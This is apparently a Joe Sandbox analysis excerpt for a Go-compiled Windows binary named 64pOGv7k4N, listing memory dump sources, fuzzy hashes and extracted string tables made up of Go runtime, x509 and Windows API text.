                                                                                • String ID: !$min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r$min too largenil stackbaseout of memoryparsing time powrprof.dll$runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory
                                                                                • API String ID: 0-3415125760
                                                                                • Opcode ID: fd30782eac03d15da3acf9b19fae26bdc0b3347069873723039259e9bf32f3bf
                                                                                • Instruction ID: 0714421e02d4a3bc75c94ce54cabc833425ff6e14f65b81d98f10edfda6a069f
                                                                                • Opcode Fuzzy Hash: fd30782eac03d15da3acf9b19fae26bdc0b3347069873723039259e9bf32f3bf
                                                                                • Instruction Fuzzy Hash: B202C13560971A8FD315EF99C4C0A4EB7E2FBC4344F54893DE9958B381EBB1A845CB82
                                                                                Strings
                                                                                • ', xrefs: 00AE4BC3
                                                                                • suspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstraints extensionx509: invalid subject alte, xrefs: 00AE4BBA
                                                                                • invalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobject is remote mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runt, xrefs: 00AE4BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '$invalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobject is remote mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runt$suspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstraints extensionx509: invalid subject alte
                                                                                • API String ID: 0-2094483264
                                                                                • Opcode ID: 0172f2d6e63724b24528a9dd70fc097c3fc5270ef1fb86c226f16fac40330535
                                                                                • Instruction ID: 22f3368300672129230fdccb20b6255baaf0a11f35206d67a7ed4614d96a61d0
                                                                                • Opcode Fuzzy Hash: 0172f2d6e63724b24528a9dd70fc097c3fc5270ef1fb86c226f16fac40330535
                                                                                • Instruction Fuzzy Hash: 8DD1107460C3908FC704DF26C190A2ABBF1AF89744F58886DF8D59B392D739E944DB92
                                                                                Strings
                                                                                • +, xrefs: 00AD4CE7
                                                                                • grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errorno, xrefs: 00AD4CDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +$grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errorno
                                                                                • API String ID: 0-3812513437
                                                                                • Opcode ID: 3387fb6d44e3c064eb687d5d148d116ec6e378f137ae5d54756d36befcf84c69
                                                                                • Instruction ID: f55b00c99c65a012b76aacdcd8af011d2954c6947efa53009580c895d6577416
                                                                                • Opcode Fuzzy Hash: 3387fb6d44e3c064eb687d5d148d116ec6e378f137ae5d54756d36befcf84c69
                                                                                • Instruction Fuzzy Hash: 062204746093419FC744DF29C190A6EBBE1BF89744F05896EF8CA8B392D734E945CB82
                                                                                Strings
                                                                                • scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00ACBCFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-354143206
                                                                                • Opcode ID: 80911fd51cbefa073dfa5bd6856623fadd19b95d69eb2f3bc3741c16f5d174ff
                                                                                • Instruction ID: 40a67ca3ebcfc28f71094fb1fa18a8bd39ab86b34e3061b59a62a8e3f0c22ebd
                                                                                • Opcode Fuzzy Hash: 80911fd51cbefa073dfa5bd6856623fadd19b95d69eb2f3bc3741c16f5d174ff
                                                                                • Instruction Fuzzy Hash: 00912574A183448FC314DF59C481A2AFBF2BBC8310F16892DE9994B756DB76EC41CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: afe5e3256e7fe6012d3a3d978333ec27e95031577c11e996fef0c7014a625a21
                                                                                • Instruction ID: 24de0d5fab6353a39622a5d0d88c9c80af2cb5898ce39f26b671925ea8268fc4
                                                                                • Opcode Fuzzy Hash: afe5e3256e7fe6012d3a3d978333ec27e95031577c11e996fef0c7014a625a21
                                                                                • Instruction Fuzzy Hash: 2202A473F147254BD3148E5DCC80249B2E2ABC8634F4EC72DEDA9A7381D974AD468BC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 34c27c01ba3a396becee3c7eae3ece72823cdc69458722a20b75fccea5e35980
                                                                                • Instruction ID: efeef28d9dd58b307a90cada27da32e91bf1a497df0eefca9fce43b5e7be91af
                                                                                • Opcode Fuzzy Hash: 34c27c01ba3a396becee3c7eae3ece72823cdc69458722a20b75fccea5e35980
                                                                                • Instruction Fuzzy Hash: A4E19F32A083158FC714DE5DC98074EFBE2ABC4344F59893DE9949B395EBB5AC0987C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0bb74a94fcfcd1b6a0399f6496b7bc50bf6983fde1039f18c7eb0f79fc84cc1a
                                                                                • Instruction ID: 59e188c6ffbb4ca18083c54f13cbc97c59d8e9135d72300353f3926ba18f3af2
                                                                                • Opcode Fuzzy Hash: 0bb74a94fcfcd1b6a0399f6496b7bc50bf6983fde1039f18c7eb0f79fc84cc1a
                                                                                • Instruction Fuzzy Hash: 25C1D67670931A8FC315DF99C8C060EF7E2BBC8340F58853DE59587385EBB19909CA86
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58bc720489994aebf00dec37cc65c2b81df0e2e809b093698a97c863206b763d
                                                                                • Instruction ID: 1599c031cb0288e722bb052011e961dd568f31c84a0762aee662b3088fbbea89
                                                                                • Opcode Fuzzy Hash: 58bc720489994aebf00dec37cc65c2b81df0e2e809b093698a97c863206b763d
                                                                                • Instruction Fuzzy Hash: 4EB17D3274972A4FC315CE9988D021EB6D3ABC8350F59863ED5668B3D5FB719C0AC2C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2db78560a6ed10b1eb9d97bb59e8e14ad0845706172086c740cbdb44a58e2e6
                                                                                • Instruction ID: 47137c88b699018dd1df4b498b1e8428616aabf7e7a2b436c87764d1e1bba3b5
                                                                                • Opcode Fuzzy Hash: a2db78560a6ed10b1eb9d97bb59e8e14ad0845706172086c740cbdb44a58e2e6
                                                                                • Instruction Fuzzy Hash: 2CB1E873A197254BC314CE59C8C060AF7E2BFC8610F5A862DEDA857345EA71ED09CBC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7492c3ffd51d256b395b63073e116e69773b3b2e2328aaed7bd71ac6374a0e15
                                                                                • Instruction ID: e18f42b8a13580fbef6e85d7b5caef3c45576137b7a28749a5dac0a378194d4d
                                                                                • Opcode Fuzzy Hash: 7492c3ffd51d256b395b63073e116e69773b3b2e2328aaed7bd71ac6374a0e15
                                                                                • Instruction Fuzzy Hash: E2C12575A08345CFC718DF29C480A1AFBF2BF88340F56896DE99997312E770E945CB82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2eb1e568d071a6646065b5d9e94185b0ab55dd727f95450bde45dc5f950a1944
                                                                                • Instruction ID: c130fa39254230d133fbe432fc57aef06531c5a9d92b9dc6e377c4bd81984e26
                                                                                • Opcode Fuzzy Hash: 2eb1e568d071a6646065b5d9e94185b0ab55dd727f95450bde45dc5f950a1944
                                                                                • Instruction Fuzzy Hash: 7181DC76A4C745CFC325DE29C880B2AB7E2BBD8310F25867DDAA587382DB30D905DB41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e748ee3c0506ea15317e8d7dc0770ca45d8f074a1438f35cfbf6066ab78d4b3
                                                                                • Instruction ID: dee0207f129d44a5e8c0385165ff03769b0266d5c233929b4c9d87afc8956d05
                                                                                • Opcode Fuzzy Hash: 9e748ee3c0506ea15317e8d7dc0770ca45d8f074a1438f35cfbf6066ab78d4b3
                                                                                • Instruction Fuzzy Hash: E971A9B46043498FC714EF64D880A9ABBE4BB59720F4545ADE9488B343D7B0ED45CBE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ccc0546fb8cbb8c3abf9b1c2c5d84b0553d1f2db9be89524296908967b682a49
                                                                                • Instruction ID: cf6cca5a70ce3d93f34df3a2c86c2af9b2ee444bbd93da048c26b4ce12b41e43
                                                                                • Opcode Fuzzy Hash: ccc0546fb8cbb8c3abf9b1c2c5d84b0553d1f2db9be89524296908967b682a49
                                                                                • Instruction Fuzzy Hash: AA81B4B46083459FC308DF18C590A2ABBF1FFC9354F10896EE99A97392D734E945CB46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e8fe8dab98bcdb554b0bb8f9b5152434e1b8f6c152cad3aa19543ed182f13870
                                                                                • Instruction ID: eb81a55e7007a553ab7378e0ffeaed5e7664c27435934d1133abd0c21b2e7f04
                                                                                • Opcode Fuzzy Hash: e8fe8dab98bcdb554b0bb8f9b5152434e1b8f6c152cad3aa19543ed182f13870
                                                                                • Instruction Fuzzy Hash: E8517DB5A083158FC715DF68C48065DB7E0FB88304F41596EE99A9B382E735D949CB82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 201ebf5848fcd090aa2c31213f4c80904c684ba8023baf94f3b15f1402a6b34a
                                                                                • Instruction ID: 4be214262524cb6e04fae8fedde68c4110b0c44b74d32d5a7e633c3771b8278b
                                                                                • Opcode Fuzzy Hash: 201ebf5848fcd090aa2c31213f4c80904c684ba8023baf94f3b15f1402a6b34a
                                                                                • Instruction Fuzzy Hash: 4E41A171914B448BC306DF78C49136AB7E5BFD5384F148B2DE84AAB293EB75D882C642
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a06e62db61cf3e97b2c77cef7c57e6abafe72a63297e7f352e6cbcd9dcfe7c6
                                                                                • Instruction ID: c510975f379059f73fbe16e1de39564bf23b89b5fd11c08a1b4bc18bea9eabf7
                                                                                • Opcode Fuzzy Hash: 9a06e62db61cf3e97b2c77cef7c57e6abafe72a63297e7f352e6cbcd9dcfe7c6
                                                                                • Instruction Fuzzy Hash: 8C414273D187298BC300AF498800249F7E5ABD4620F5FCA5EDDA457302D6B1AD158BC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 434d0c3f0ffbfa7ad33c3ea42d301467de73577e13d3713f0d48d055382b932b
                                                                                • Instruction ID: 6051d57d3d835d0dd72d8d2046099e0cd97689013ded0b188c3bb80633fa4cdd
                                                                                • Opcode Fuzzy Hash: 434d0c3f0ffbfa7ad33c3ea42d301467de73577e13d3713f0d48d055382b932b
                                                                                • Instruction Fuzzy Hash: 282122316082048BC70CCF2AC89017EF7E2AFC8300B59857DD4568B6A2EA34A809CA55
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 60bd6da54cf403ebdc87279bd144d9dc32c9275f5392d14504d915c74e12558c
                                                                                • Instruction ID: 14fa4662d7bc4756eef2995f5163fd92051155b3ffc24376e049113dbedd846e
                                                                                • Opcode Fuzzy Hash: 60bd6da54cf403ebdc87279bd144d9dc32c9275f5392d14504d915c74e12558c
                                                                                • Instruction Fuzzy Hash: 79E0B6B04083459FC310EF1CC98510ABBE0BB84220F408B5DA8B8473A1D37095088B92
                                                                                Strings
                                                                                • : cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected , xrefs: 00AC4AF9, 00AC4BA3, 00AC4C2B
                                                                                • , not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileW, xrefs: 00AC4D9B
                                                                                • because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDi, xrefs: 00AC4C67
                                                                                • (, xrefs: 00AC4D8B
                                                                                • : pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %v, xrefs: 00AC4D3E
                                                                                • : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid nam, xrefs: 00AC4D81
                                                                                • : second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot p, xrefs: 00AC4CA9
                                                                                • +, xrefs: 00AC4DCF
                                                                                • : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedun, xrefs: 00AC4DC6
                                                                                • nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AC4D54
                                                                                • to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMu, xrefs: 00AC4B1B, 00AC4BC5, 00AC4C4D
                                                                                • : pointer not at beginning of allocated blockx509: inner and outer signature algorithm identifiers don't matchx509: issuer name does not match subject from issuing certificatelast data directory entry is a reserved field, must be set to zer, xrefs: 00AC4CEE
                                                                                • , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AC4CC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-576860315
                                                                                • Opcode ID: 1019e2367a003acec4e78c1f7836db8a9b273b6dc115a591baef9a12fedaef40
                                                                                • Instruction ID: 10434afbf141fa5d36e7d00953710aa278b78aee7982196c6db37757029965ad
                                                                                • Opcode Fuzzy Hash: 1019e2367a003acec4e78c1f7836db8a9b273b6dc115a591baef9a12fedaef40
                                                                                • Instruction Fuzzy Hash: D60221B46083418FC714EF24C590B6ABBF1BF88744F16892EE8D98B391E775D944CB86
                                                                                Strings
                                                                                • runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc, xrefs: 00ABA59B
                                                                                • out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWR, xrefs: 00ABA39C
                                                                                • misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of rangeruntime: castogscanstatus old, xrefs: 00ABA570
                                                                                • ) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe, xrefs: 00ABA5EF
                                                                                • memory reservation exceeds address space limitos: unexpected result from WaitForSingleObjectpanicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physica, xrefs: 00ABA623
                                                                                • arena already initializedarray index out of boundsbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid ob, xrefs: 00ABA37C
                                                                                • ., xrefs: 00ABA62C
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00ABA5C5
                                                                                • region exceeds uintptr range unexpectedruntime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: in, xrefs: 00ABA53B
                                                                                • out of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-struct type : string index out of range : cannot pass runtime: g is running , xrefs: 00ABA350
                                                                                • out of memory allocating heap arena metadata : funcLayout with interface receiver use of WriteTo with pre-connected connectionx509: internal error: cannot parse domain %qx509: invalid RDNSequence: invalid attributebufio.Scanner: Read returned impossible , xrefs: 00ABA366
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-1386449106
                                                                                • Opcode ID: 154cd77156eeaa79bc312c87e67464820227f868ec85b2b471e9d6ccd1c9e493
                                                                                • Instruction ID: 001d6dc933ccf83d5b5a8472d36a0449c05ffec9f980917966b5dc2701fff676
                                                                                • Opcode Fuzzy Hash: 154cd77156eeaa79bc312c87e67464820227f868ec85b2b471e9d6ccd1c9e493
                                                                                • Instruction Fuzzy Hash: 10F124B4A083449FC704EF69D18069EBBF5BF98704F45892DE9888B352D7B0E945CF92
                                                                                Strings
                                                                                • work.full != 0zero parameter with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomA, xrefs: 00AC7FEE
                                                                                • 8, xrefs: 00AC819A
                                                                                • next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNa, xrefs: 00AC806F
                                                                                • wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFre, xrefs: 00AC7F08
                                                                                • jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLy, xrefs: 00AC8099
                                                                                • flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOS, xrefs: 00AC7EC2
                                                                                • nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetOb, xrefs: 00AC80EE
                                                                                • P has cached GC work at end of mark terminationRtlDosPathNameToRelativeNtPathName_U_WithStatusasn1: Unmarshal recipient value is non-pointer attempting to link in too many shared librariesbufio: reader returned negative count from Readcorrupt PE file. Image ba, xrefs: 00AC7F91
                                                                                • runtime: P runtime: p scheddetailsechost.dllsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dllversion.dllwsock32.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages, xrefs: 00AC7E97
                                                                                • in gcMark expecting to see gcphase as _GCmarkterminationnon-empty pointer map passed for non-pointer-size valuespkcs7: unsupported digest %q for encryption algorithm %qprofilealloc called without a P or outside bootstrappingstrings: illegal use of non-zero Bui, xrefs: 00AC8191
                                                                                • runtime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AC8045
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-3575252255
                                                                                • Opcode ID: bcc36360e2662c89ed3bc231da6ee7e930c2b3fc5188d3bc77de1d3dcd050b63
                                                                                • Instruction ID: de24f9a6735d30c83d23ed961d3e73ed5d9816ae5e7e752e3d00e00be4ec5de1
                                                                                • Opcode Fuzzy Hash: bcc36360e2662c89ed3bc231da6ee7e930c2b3fc5188d3bc77de1d3dcd050b63
                                                                                • Instruction Fuzzy Hash: 54D12C74909745CFC704EF66E695B2EBBE1BF88308F45882DE8899B352DB709844CF52
                                                                                Strings
